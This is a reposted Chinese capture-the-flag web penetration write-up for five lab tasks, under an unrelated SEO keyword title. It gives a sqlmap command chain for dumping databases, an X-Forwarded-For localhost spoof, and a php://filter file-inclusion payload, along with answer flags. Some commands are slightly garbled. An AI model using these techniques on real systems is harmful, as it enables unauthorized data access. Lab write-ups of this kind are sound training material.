中国国音电商平台官网乐陵seo营销
中国国音电商平台官网,乐陵seo营销,wordpress前端登录插件,景德镇做网站的公司 web安全渗透
1.通过URL访问http://靶机IP/1#xff0c;对该页面进行渗透测试#xff0c;将完成后返回的结果内容作为flag值提交#xff1b;
访问该网页后发现F12被禁用#xff0c;使用ctrlshifti查看
ctrlshifti 等效于 F12 flag{fc35fdc70d5fc69d269883a822c7a53e} … web安全渗透
1.通过URL访问http://靶机IP/1对该页面进行渗透测试将完成后返回的结果内容作为flag值提交
访问该网页后发现F12被禁用使用ctrlshifti查看
ctrlshifti 等效于 F12 flag{fc35fdc70d5fc69d269883a822c7a53e}
2.通过URL访问http://靶机IP/2对该页面进行渗透测试将完成后返回的结果内容作为flag值提交
访问该网页后点击submit输入1 使用sqlmap注入 sqlmap -u 目标URL # 探测存在注入点的系统所使用的数据库类型 sqlmap -u 目标URL --dbs #爆破出目标系统中的所有数据库 sqlmap -u 目标URL -D 数据库 #选择要爆破的数据库进行简单的爆表操作 sqlmap -u 目标URL -D 数据库 -T 表名 --columns #选择表名之后需要对字段进行爆破猜解 sqlmap -u 目标URL -D 数据库 -T 表名 -C 字段名 -dump #爆破字段值 f14g{187ef4436122d1cc2f40dc2b92f0eba0}
3.通过URL访问http://靶机IP/3对该页面进行渗透测试将完成后返回的结果内容作为flag值提交
猜测禁止网络爬虫的文件为robots.txt 发现可疑路径/chinaskills/flag.txt 并去访问查看 flag{8c7dd922ad47494fc02c388e12c00eac}
4.通过URL访问http://靶机IP/4对该页面进行渗透测试将完成后返回的结果内容作为flag值提交
通过burp抓包 添加X-Forwarded-For:127.0.0.1 flag{c71b47723409ac75d3e6b28f78b372ce}
5.通过URL访问http://靶机IP/5对该页面进行渗透测试将完成后返回的结果内容作为flag值提交
文件包含
修改URL
将 text.txt 删除并添加 php://filter/readconvert.base64-encode/resourceflag.php使用base64对flag.php输出流进行编码 解码base64
1.使用burp解码
2.base -d xxx.txt .txt中必须是base64编码
3.echobase64编码 |base -d flag{098f6bcd4621d373cade4e832627b4f6}
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/90350.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!